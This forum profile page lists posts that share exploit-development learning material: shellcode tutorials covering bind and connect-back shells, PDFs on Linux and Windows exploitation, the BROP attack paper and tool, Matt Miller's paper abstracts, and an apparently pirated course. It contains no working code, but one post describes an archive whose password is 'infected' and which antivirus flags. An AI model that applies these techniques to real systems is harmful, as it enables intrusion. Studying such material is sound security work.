Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by NO-MERCY

  1. Excellent paper ... let's move to Overflow Routers Read More : WRT120N fprintf Stack Overflow Developing MIPS Exploits to Hack Routers Exploiting Embedded Devices Router Exploitation - BHUSA09-Lindner WRITING MIPS-IRIX SHELLCODE
  2. Hello RST: Shellcode Tutorials | Project Shellcode The following are tutorials on how to write Windows shellcode for beginners through to advanced. Maded by : Ty Miller http://www.projectshellcode.com and it's not available .. NO MORE .... So .. here you can download it as a book .. all in one PDF Hope You Find It Useful Contents: Shellcode Tutorial 1: Introduction and Tools Setup Gives an intro into shellcode and steps you through setting up your environment. Shellcode Tutorial 2: My First Simple Shellcode Steps you through creating and testing very simple shellcode. Shellcode Tutorial 3: Windows Command Execution Shellcode Define and locate a string constant, and use it to create a new administrative Windows user. Shellcode Tutorial 4: Message Box Shellcode Teaches you how to load libraries, call simple functions, and execute them. Shellcode Tutorial 5: Function Hash Generation Defining and using constants, more complex functions, generating function hashes, and an introduction to OllyDbg! Shellcode Tutorial 6: Dynamic Shellcode Dynamically locate Kernel32 and function addresses. No more hardcoded addreses! Shellcode Tutorial 7: Introduction to Sockets - Portbind Shellcode Dynamic shellcode that loads ws2_32.dll and creates a listening port that provides a command shell to remote users. Shellcode Tutorial 8: Introduction to Networking - Connectback Shellcode Dynamic shellcode that initializes a connection back to the attacker and connects them to a command shell on the compromised system. Shellcode Tutorial 9: Generating Shellcode Using Metasploit Use the Metasploit Exploit Framework web interface and msfpayload command to generate various shellcode for different platforms in a range of formats. Details: Pdf By: NO-MERCY File: Project Shellcode Development Framework.pdf CRC-32: 130372df MD4: a8dc3c59cac4797c555e3a9f20aaa642 MD5: 54f473cb20951c80f0b06e222b26ab06 SHA-1: ab0890de6346604f6f6ad7a2c20de890921e66d4 Pages:70 Size:1.35 MB Download Book Tools Used (part1 Contents) : all files will be available here .. Just some Minutes ----------------------------------------------------- Ok .. the link Contain tools used + skape paper + Steve Hanna article + 2 Books Note : You can Use any Metasploit Version it's not included because my Fu**ing Limited internet ..... Tools Used Size: 14.8 MB Password: infected why? because 'shellcode-compiler.sh' AV will catch it .. Regards NO-MERCY and Of Course Thanks Ty Miller
  3. Hello Rst: How to write a (Linux x86) shellcode 1- Introduction to Linux shellcode writing (Part 1) 2- Introduction to Linux shellcode writing (Part 2) 3- How to write a (Linux x86) port-biding shellcode 4- How to write a (Linux x86) reverse connection shellcode 5- How to write a (Linux x86) egg hunter shellcode This is very brief and basic list of steps to follow if you want to write a shellcode under Linux operating system. Introduction to Linux shellcode writing (Part 1) | Adventures in the programming jungle In the previous ticket we created a dummy shellcode firstly in C language and then in the assembler language; we tested the dummy shellcode but we’ve seen that the execution was failing. In this ticket we will try to fix the dummy shellcode problems and hopefully we will be able to execute it successfully. Introduction to Linux shellcode writing (Part 2) | Adventures in the programming jungle The goal of this ticket is to write a shellcode that will open a socket on a specific port and executes a shell when someone connects to the specific port. How to write a (Linux x86) port-biding shellcode | Adventures in the programming jungle The goal of this ticket is to write a shellcode that makes a connection from the hacked system to a different system where it can be cached by different network tools like net cat How to write a (Linux x86) reverse connection shellcode | Adventures in the programming jungle The goal of this ticket is to write an egg hunter shellcode. An egg hunter is a piece of code that when is executed is looking for another piece of code (usually bigger) called the egg and it passes the execution to the egg. This technique is usually used when the space of executing shellcode is limited (the available space is less than the egg size) and it is possible to inject the egg in another memory location. Because the egg is injected in a non static memory location the egg must start with an egg tag in order to be recognized by the egg hunter. How to write a (Linux x86) egg hunter shellcode | Adventures in the programming jungle Regards NO-MERCY Source: http://itblog.adrian.citu.name/category/it-security/shellcode/
  4. it's Not Added to torrent Yet .. Try Once Again with Valid Links (Nitroflare) & resume Download With idm without download it again "Refresh Download address" and "IDM" will go to webpage link and download the file without closing the small popup window it will close when catching new link and resume download
  5. Hello RST : Final Dark Pdf Edition Completed All Code Syn-taxed Cover : Details : File: Linux (x86) Exploit Development Series _ Final Black.pdf CRC-32: 5efc67a5 MD4: 8a7f2415918cf8bb1e94dcda68bf1608 MD5: 2142e345fad13acdfcea20ea85f23ce0 SHA-1: 7ae65d6515136e9e912be94a0e0013b056071639 Pages: 107 Size: 10.4 MB Download : 4SHARED Link Best Regards NO-MERCY
  6. thx .. I'll try to Make Final Edition Soon u Know it's Take Very Very Long Time But Promise .. tO be Continue .. you Mean all links in pdf or just pics hyperlinks or you don't trust any Damn link Greetings
  7. Blind Return Oriented Programming (BROP) Hello Rst : When hacking software, there are three exploit scenarios: Open-source (e.g., Apache) Open-binary (e.g., Internet Explorer) Closed-binary and source (e.g., some proprietary network service) This work studies whether it is possible to attack the third case. The BROP attack makes it possible to write exploits without possessing the target's binary. It requires a stack overflow and a service that restarts after a crash. Based on whether a service crashes or not (i.e., connection closes or stays open), the BROP attack is able to construct a full remote exploit that leads to a shell. The BROP attack remotely leaks enough gadgets to perform the write system call, after which the binary is transferred from memory to the attacker's socket. Following that, a standard ROP attack can be carried out. Apart from attacking proprietary services, BROP is very useful in targeting open-source software for which the particular binary used is not public (e.g., installed from source setups, Gentoo boxes, etc.). The attack completes within 4,000 requests (within minutes) when tested against a toy proprietary service, and real vulnerabilities in nginx and MySQL. The fundamental problem sometimes seen in servers is that they fork a new worker process after a crash, without any rerandomization (e.g., no execve follows the fork). nginx for example does this. The paper describing the work is: A. Bittau, A. Belay, A. Mashtizadeh, D. Mazières, D. Boneh: Paper. In Oakland 2014. [slides] Attack outline Break ASLR by "stack reading" a return address (and canaries). Find a "stop gadget" which halts ROP chains so that other gadgets can be found. Find the BROP gadget which lets you control the first two arguments of calls. Find a call to strcmp, which as a side effect sets the third argument to calls (e.g., write length) to a value greater than zero. Find a call to write. Write the binary from memory to the socket. Dump the symbol table from the downloaded binary to find calls to dup2, execve, and build shellcode. Downloads Braille A fully automated tool that conducts a BROP attack (from crash to remote shell) when supplied with an input string that crashes a server due to a stack overflow. Optimized nginx BROP exploit A generic 64-bit exploit for nginx 1.4.0 that uses BROP, optimized for nginx's case. This also includes an IP fragmentation router to make the attack possible on WANs. nginx does a non-blocking read on a 4096 byte buffer, and typical MTUs are 1500, so IP fragmentation is needed to deliver a large TCP segment that will result in a single read of over 4096 bytes. Ali's server The toy proprietary service written by a colleague used as a test case in the paper for hacking without neither binary nor source code knowledge. Source : http://www.scs.stanford.edu/brop/ Tutorial In Chinese : Chung Fing Hung http://drops.wooyun.org/tips/3071 Tutorials by : Liu Yutao in English : Blind Return Oriented Programming (BROP) Attack (1) http://ytliu.info/blog/2014/05/31/blind-return-oriented-programming-brop-attack-yi/ Blind Return Oriented Programming (BROP) Attack (2) http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/ PART1 & 2 in PDF By : NO-MERCY Demo : http://ytliu.info/images/nginx-brop.mp4 Regards NO-MERCY
  8. All In One Pdf Finished Today : Details : File: Modern Windows Exploit Development.pdf Size: 19.0 MB Pages: 529 CRC-32: 0c5c697f MD4: 5ed2b468e7d5e0d6938205cd5964354b MD5: 38a36b37a5105195795e57edde6cb217 SHA-1: bd23cc60c3508ecbb7fb87ec02ceb774d89ff49e Download : Modern Windows Exploit Development - Download - 4shared - NO-MERCY AT4RE Regards NO-MERCY FileShare Download Modern Windows Exploit Development.pdf (by: Church) https://mega.nz/#!9lwRnAAB!Hw0pP7NMLfdcE8saw0uI9coAG2a_0xckiL9IMhUJz_Y (by: m4v3rick) https://drive.google.com/file/d/0B8sHjc3kJKQrUTYxSkpldy01ZWs/view (By:Unknown)
  9. Take a look : Project Zero: In-Console-Able https://bromiumlabs.files.wordpress.com/2013/07/application_sandboxes_a_pen_tester_s_perspective2.pdf
  10. Skape - From Metasploit to Microsoft Hello Rst : If You interested in Windows Exploitation Then you Saw This name several Times while Seaching Or Reading Some Papers & Articles Matt Miller Aka Skape (Who's This Guy ?) Metasploit developer , who for years frustrated Microsoft officials with the public release of Windows exploits, is heading to Redmond to join Microsoft's Security Science team. Miller, who uses the hacker moniker Skape,will work on improved ways to find security vulnerabilities and better software defenses through mitigations, according to an announcement by SDL guru Michael Howard. "Matt brings a massive amount of real-world exploit and defense experience to our team," Howard said, nothing that Miller has been focused on design review for Windows 7, the next major revision of the operating system. Miller's work around exploiting -- and attempting to secure -- the Windows ecosystem is legendary. In tandem with HD Moore, he has been one of the core developers on Metasploit, a free point-and-click pentest/attack tool, specializing in exploitation techniques/mitigations, reverse engineering, program analysis and modeling, rootkits and virtualization. Over IM this morning, HD Moore said Miller designed a large chunk of the Metasploit 3 architecture, built the meterpreter payload system, and generally led the entire win32 shellcode improvement efforts. "He has done some exploit work as well, but his focus was mostly on encoders, shellcode, and payloads," Moore said. Miller was the third 'full-time' developer at Metasploit, having joined the volunteer group in mid-2004. He is the author of several groundbreaking research papers, including techniques to bypass Windows Hardware-enforced DEP, improving software security analysis using exploitation properties and exploring the history of exploitation techniques (.pdf) and mitigations on Windows. Miller is also an editor for the Uninformed Journal, a free online journal that focuses on encouraging the sharing of technical knowledge. Miller just open-sourced his WehnTrust HIPS project, which adds anti-exploit mechanisms/mitigations to Windows 2000, Windows XP and Windows Server 2003 systems. skape mmiller [at] hickorg Interests Exploitation techniques Exploitation mitigations Program analysis & modeling Reverse engineering Rootkits Virtualization Software metasploit An advanced, open-source exploitation framework. wehntrust An implementation of Address Space Layout Randomization (ASLR) for Windows 2000, XP, and 2003 Server. x64auto IDA plugin designed to provide additional information when analyzing x64 PE files. winstrace A user-mode system call tracing utility for Windows. memgrep A dynamic memory analysis utility for Linux and FreeBSD. Presentations The Evolution of Microsoft's Exploit Mitigations (Blue Hat Fall 2008) Avoiding Driver Security Pitfalls (DDC 2008) Modeling the trust boundaries created by securable objects (WOOT 2008) State of the Exploit (Seattle ToorCon 2008) A Brief History of Exploitation Techniques and Mitigations on Windows (BreakPoint 2007) Cthulhu: A software analysis framework built on Phoenix (ToorCon 2007) Exploitation Chronomancy (ToorCon 2005) Beyond EIP (Black Hat USA 2005) Papers Using dual-mappings to evade automated unpackers (Oct, 2008) Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to. Modeling the trust boundaries created by securable objects (Jul, 2008) One of the most critical steps of any security review involves identifying the trust boundaries that an application is exposed to. While methodologies such as threat modeling can be used to help obtain this understanding from an application's design, it can be difficultcult to accurately map this understanding to an application's implementation. This difficultculty suggests that there is a need for techniques that can be used to gain a better understanding of the trust boundaries that exist within an application's implementation. To help address this problem, this paper describes a technique that can be used to model the trust boundaries that are created by securable objects on Windows. Dynamic instrumentation is used to generate object trace logs which describe the contexts in which securable objects are defned, used, and have their security descriptor updated. This information is used to identify the data flows that are permitted by the access rights granted to securable objects. It is then shown how these data flows can be analyzed to gain an understanding of the trust boundaries, threats, and potential elevation paths that exist within a given system. Improving Software Security Analysis using Exploitation Properties (Dec, 2007) Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration. A Catalog of Local Windows Kernel-mode Backdoor Techniques (Aug, 2007) This paper presents a detailed catalog of techniques that can be used to create local kernel-mode backdoors on Windows. These techniques include function trampolines, descriptor table hooks, model-specific register hooks, page table modifications, as well as others that have not previously been described. The majority of these techniques have been publicly known far in advance of this paper. However, at the time of this writing, there appears to be no detailed single point of reference for many of them. The intention of this paper is to provide a solid understanding on the subject of local kernel-mode backdoors. This understanding is necessary in order to encourage the thoughtful discussion of potential countermeasures and perceived advancements. In the vein of countermeasures, some additional thoughts are given to the common misconception that PatchGuard, in its current design, can be used to prevent kernel-mode rootkits. Generalizing Data Flow Information (Aug, 2007) Generalizing information is a common method of reducing the quantity of data that must be considered during analysis. This fact has been plainly illustrated in relation to static data flow analysis where previous research has described algorithms that can be used to generalize data flow information. These generalizations have helped support more optimal data flow analysis in certain situations. In the same vein, this paper describes a process that can be employed to generalize and persist data flow information along multiple generalization tiers. Each generalization tier is meant to describe the data flow behaviors of a conceptual software element such as an instruction, a basic block, a procedure, a data type, and so on. This process makes use of algorithms described in previous literature to support the generalization of data flow information. To illustrate the usefulness of the generalization process, this paper also presents an algorithm that can be used to determine reachability at each generalization tier. The algorithm determines reachability starting from the least specific generalization tier and uses the set of reachable paths found to progressively qualify data flow information for each successive generalization tier. This helps to constrain the amount of data flow information that must be considered to a minimal subset. Memalyze: Dynamic Analysis of Memory Access Behavior in Software (Apr, 2007) This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail. Reducing the Effective Entropy of GS Cookies (Mar, 2007) This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined. Locreate: An Anagram for Relocate (Dec, 2006) This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper. Exploiting 802.11 Wireless Driver Vulnerabilities on Windows (Nov, 2006) This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised. Preventing the Exploitation of SEH Overwrites (Sep, 2006) This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation. While Microsoft has attempted to address this attack vector through changes to the exception dispatcher and through enhanced compiler support, such as with /SAFESEH and /GS, the majority of benefits they offer are limited to image files that have been compiled to make use of the compiler enhancements. This limitation means that without all image files being compiled with these enhancements, it may still be possible to leverage an SEH overwrite to gain code execution. In particular, many third-party applications are still vulnerable to SEH overwrites even on the latest versions of Windows because they have not been recompiled to incorporate these enhancements. To that point, the technique described in this paper does not rely on any compile time support and instead can be applied at runtime to existing applications without any noticeable performance degradation. This technique is also backward compatible with all versions of Windows NT+, thus making it a viable and proactive solution for legacy installations. Implementing a Custom x86 Encoder (Aug, 2006) This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder. In particular, this vulnerability does not permit the use of uppercase characters. To help make things more interesting, the encoder described in this paper will also avoid all characters above 0x7f. This will make the encoder both UTF-8 safe and tolower safe. Exploiting the Otherwise Non-exploitable on Windows (May, 2006) This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such as NULL pointer dereferences. To facilitate this, an attacker gains control of the top-level unhandled exception filter for a process in an indirect fashion. While there has been previous work illustrating the usefulness in gaining control of the top-level unhandled exception filter, Microsoft has taken steps in XPSP2 and beyond, such as function pointer encoding[4], to prevent attackers from being able to overwrite and control the unhandled exception filter directly. While this security enhancement is a marked improvement, it is still possible for an attacker to gain control of the top-level unhandled exception filter by taking advantage of a design flaw in the way unhandled exception filters are chained. This approach, however, is limited by an attacker's ability to control the chaining of unhandled exception filters, such as through the loading and unloading of DLLs. This does reduce the global impact of this approach; however, there are some interesting cases where it can be immediately applied, such as with Internet Explorer. Improving Automated Analysis of Windows x64 Binaries (Apr, 2006) As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can be performed prior to doing code or data flow analysis can be useful in getting a better understanding for how a binary operates. To that point, this paper gives a brief explanation of some of the changes that have been made to support Windows x64 binaries. From there, a few basic techniques are illustrated that can be used to improve the process of identifying functions, annotating their stack frames, and describing their exception handler relationships. Source code to an example IDA plugin is also included that shows how these techniques can be implemented. Bypassing PatchGuard on Windows x64 (Dec, 2005) The Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors from modifying certain critical operating system structures. These structures include things like specific system images, the SSDT, the IDT, the GDT, and certain critical processor MSRs. This feature is intended to ensure kernel stability by preventing uncondoned behavior, such as hooking. However, it also has the side effect of preventing legitimate products from working properly. For that reason, this paper will serve as an in-depth analysis of PatchGuard's inner workings with an eye toward techniques that can be used to bypass it. Possible solutions will also be proposed for the bypass techniques that are suggested. Windows Kernel-mode Payload Fundamentals (Dec, 2005) This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows. Bypassing Windows Hardware-enforced Data Execution Prevention (Oct, 2005) This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute code from regions that are typically non-executable when hardware support is present, such as thread stacks and process heaps. While other techniques have been used to accomplish similar feats, such as returning into NtProtectVirtualMemory, this approach requires no direct reprotecting of memory regions, no copying of arbitrary code to other locations, and does not have issues with NULL bytes. The result is a feasible approach that can be used to easily bypass the enhancements offered by hardware-enforced DEP on Windows in a way that requires very minimal modifications to existing exploits. Temporal Return Addresses: Exploitation Chronomancy (Aug, 2005) Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit authors generally make use of static addresses that may or may not be portable between various operating system and application revisions. This fact can make exploits unreliable depending on how well researched the static addresses were at the time that the exploit was implemented. In some cases, though, it may be possible to predict and make use of certain addresses in memory that do not have static contents. This document introduces the concept of temporal addresses and describes how they can be used, under certain circumstances, to make exploitation more reliable. http://uninformed.org/?v=1&a=5&t=sumry"]Annoyances Caused by Unsafe Assumptions (Apr, 2005) This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases will be dissected and discussed in detail for the purpose of showing how third-party applications can fail when used in conjunction with software that performs certain tasks. The analysis of the two cases is meant to show how complex failure conditions can be analyzed and used to determine inter-operability problems. Post-Exploitation on Windows using ActiveX Controls (Mar, 2005) When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS. Metasploit's Meterpreter (Dec, 2004) Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) ï¬les that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection. Safely Searching Process Virtual Address Space (Sep, 2004) This paper describes some techniques that can be used to search the virtual address space of a process for a unique key as a part of running code that is at an unknown location in memory. The code that is used to search the process address space is designed to be extremely compact in order to make it useful in scenarios where a particularly imposes limitations on the size of the payload that can be used in the context of the initial overflow. Remote Library Injection (Apr, 2004) The common methods currently employed to compromise comput- ers are ineffective and easily detected by standard Anti-Virus practices. Despite this, worm authors continue to use these same approaches, blindly hoping that at least some of the hosts will remain infected long enough for the worm au- thor to make use of them. An alternative to the standard methods of computer compromise involves making use of a more complicated, yet high-yield, solution: library injection. When used in conjunction with a remote vulnerability, such as the DCOM vulnerability, library injection can lead to an undetectable com- promise at the host level as far as current Anti-Virus detection mechanisms are concerned. The impact from this is far-reaching; so much so that a completely automated, high-retention, operating system independent super-worm is an ever approaching reality. Reverse Engineering: Memory Analysis (Dec, 2003) This paper describes some basic techniques that can be used to dynamically analyze a program by inspecting the content of its address space at runtime. The techniques presented are then applied to show how they can be used to perform basic reverse engineering of a closed source game known as ADOM. Understanding Windows Shellcode (Dec, 2003) This paper provides an exhaustive description of the structure and purpose of windows shellcode. An in-depth walkthrough of various types of windows payloads is given including reverse connect, port bind, file descriptor re-use, and so on. ELF binary signing and verification (Jan, 2003) This paper provides an introduction to binary signing of ELF executables. Linux x86 run-time process manipulation (Jan, 2003) This paper illustrates run-time process manipulation techniques on Linux. Presented By: Matt Miller BlueHat v8: Mitigations Unplugged About This Video : Matt Miller explores the technical details of sophisticated mitigations like GS, DEP and ASLR. This presentation explores the technical details of these developments by illustrating the logical evolution of Microsoft mitigations and how they’ve stood the test of time. Download Exploit Mitigation Improvements in Win 8 By: Matt Miller & Ken Johnson Over the past decade, Microsoft has added security features to the Windows platform that help to mitigate risk by making it difficult and costly for attackers to develop reliable exploits for memory safety vulnerabilities. Some examples of these features include Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Visual C++'s code generation security (GS) protection for stack-based buffer overruns. In Windows 8, Microsoft has made a number of substantial improvements that are designed to break known exploitation techniques and in some cases prevent entire classes of vulnerabilities from being exploited. This presentation will provide a detailed technical walkthrough of the improvements that have been made along with an evaluation of their expected impact. In closing, this presentation will look beyond Windows 8 by providing a glimpse into some of the future directions in exploit mitigation research that are currently being explored by Microsoft. Slides Sources : http://www.hick.org/~mmiller/ http://www.uninformed.org/ http://www.zdnet.com/article/from-metasploit-to-microsoft-skape-goes-to-redmond/ Regards NO-MERCY
  11. Hello Rst : Patching Exploits with Duct Tape: Bypassing Mitigations and Backward Steps The sale of exploits and bug bounty programs are at an all-time high, as is their use by cyber criminals. OS vendors, such as Microsoft have progressively implemented a gigantic number of controls to stem the bleeding. Learn how attackers side step mitigations in accessible live demonstrations. New to exploitation or want to learn about the latest mitigations? Come along and learn more! Speakers : James Lyne Global Head of Security Research, Sophos Stephen Sims Security Researcher and Instructor, SANS Institute Video Presentation Slides : https://www.rsaconference.com/writable/presentations/file_upload/exp-r01_patching-exploits-with-duct-tape-bypassing-mitigations-and-backward-steps.pdf Source : https://www.rsaconference.com/events/us15/agenda/sessions/1835/patching-exploits-with-duct-tape-bypassing Regards
  12. Not spdy .... I think It's Google Chrome’s DLL Blacklisting Policy & Sandbox Technology You can Search & Read about Them because classic dll injection dosn't work Especially with browsers and See Also : CodeEmpire: DLL Injection into Google Chrome CodeEmpire: Code Injection into Mozilla Firefox madshi.net • View topic - Injection in Chrome process failing https://social.msdn.microsoft.com/Forums/windowsdesktop/en-US/3d5085c2-5506-43f8-b2f4-992f96a3ce22/security-protection-on-google-chrome?forum=windowssecurity https://stackoverflow.com/questions/11273449/internet-explorer-google-chrome-injection https://groups.google.com/forum/#!topic/securityxploded/ejE6dGNc0y0 https://www.chromium.org/developers/design-documents/sandbox https://www.chromium.org/Home/third-party-developers Regards
  13. Reverse Engineering and Exploit Development Hello RST : Description In this Reverse Engineering and Exploit Development training course, expert author Philip Polstra will teach you about common software vulnerabilities and how to find them, as well as how the vulnerabilities differ between various operating systems. This course is designed for beginners who are looking to get started in security, penetration testing, and reverse engineering. You will start by learning about reversing compiled Windows applications, including using fuzzing, stack overflows, and heap overflows. From there, Philip will teach you how to reverse compiled OS X, Linux, and Android applications. This video tutorial also covers how to find other vulnerabilities, including website and database vulnerabilities. Finally, you will learn about simple exploits, web exploitation, and ARM exploitation. Once you have completed this computer based training course, you will be fully capable of finding vulnerabilities and developing exploits for them. Working files are included, allowing you to follow along with the author throughout the lessons. Publisher: Infinite Skills Duration: 6 hours 69 tutorial videos Date Released: 2015-04-10 Price: $99.99 USD Table of Contents 01. Getting Started Introduction To Reversing About The Author Ethical Considerations Reversing Tools - Part 1 Reversing Tools - Part 2 Reversing Tools - Part 3 Reversing Tools - Part 4 Reversing Tools - Part 5 Reversing Tools - Part 6 0110 How To Access Your Working Files 02. Reversing Compiled Windows Applications 0201 Vulnerabilities - Part 1 0202 Vulnerabilities - Part 2 0203 Vulnerabilities - Part 3 0204 Using Fuzzing - Part 1 0205 Using Fuzzing - Part 2 0206 Using Fuzzing - Part 3 0207 Using Fuzzing - Part 4 0208 Just Enough Assembly - Part 1 0209 Just Enough Assembly - Part 2 0210 Just Enough Assembly - Part 3 0211 Stack Overflows - Part 1 0212 Stack Overflows - Part 2 0213 Stack Overflows - Part 3 0214 Heap Overflows - Part 1 0215 Heap Overflows - Part 2 0216 Heap Overflows - Part 3 0217 Heap Overflows - Part 4 0218 Format String Bugs - Part 1 0219 Format String Bugs - Part 2 0220 Format String Bugs - Part 3 0221 Format String Bugs - Part 4 0222 Section Overflows 0223 Windows Kernel Flaws 0224 Decompilers 0225 Automation - Part 1 0226 Automation - Part 2 03. Reversing Compiled OS X Applications 0301 Where Are The Vulnerabilities? 0302 Locating Stack Overflows 0303 Heap Overflows 04. Reversing Compiled Linux Applications 0401 Where Are The Vulnerabilities? 0402 Linux Stack Overflows - Part 1 0403 Linux Stack Overflows - Part 2 0404 Linux Stack Overflows - Part 3 0405 Linux Stack Overflows - Part 4 0406 Linux Stack Overflows - Part 5 0407 Linux Heap Overflows - Part 1 0408 Linux Heap Overflows - Part 2 0409 Linux Heap Overflows - Part 3 0410 Linux Heap Overflows - Part 4 0411 Linux Kernel Flaws - Part 1 0412 Linux Kernel Flaws - Part 2 05. Reversing Android Applications 0501 Introduction To Android And ARM 0502 Android Applications 06. Finding Other Vulnerabilities 0601 Web Site Vulnerabilities 0602 Database Vulnerabilities 07. Simple Exploits 0701 Going From Vulnerability To Exploit 0702 A Simple Exploit Script 0703 Creating A Metasploit Module For An Exploit - Part 1 0704 Creating A Metasploit Module For An Exploit - Part 2 0705 Creating A Metasploit Module For An Exploit - Part 3 08. Exploit Payloads 0801 Shellcode - Part 1 0802 Shellcode - Part 2 0803 Shellcode - Part 3 0804 Shellcode - Part 4 09. Making Exploits Harder To Detect 0901 Encoding Shellcode - Part 1 0902 Encoding Shellcode - Part 2 10. Web Exploitation 1001 Web Exploits In Metasploit 11. ARM Exploitation 1101 Android Exploits In Metasploit 12. Future Directions 1201 Wrap Up And Suggestions For Further Study Download NitroFlare - Upload Files [505 MB] NitroFlare - Upload Files [505 MB] NitroFlare - Upload Files [434.45 MB] Download Working_Files http://examples.oreilly.com/0636920040439/Working_Files.zip Source Reverse Engineering and Exploit Development Training Video, Online Tutorial Regards NO-MERCY
  14. ok ... Now All IN One PDF By ; NO-MERCY Details : File : Linux (x86) Exploit Development Series.pdf Pages : 164 Size : 4.1 MB CRC-32: d62360f5 MD4: f839f7d6ccc0c4c61846242a64a448f4 MD5: 1df6744fe419ca9e584723ad1fa79dd0 SHA-1: c117208aceded332cea96e0afa4dd33f91314b93 Download Regards NO-MERCY
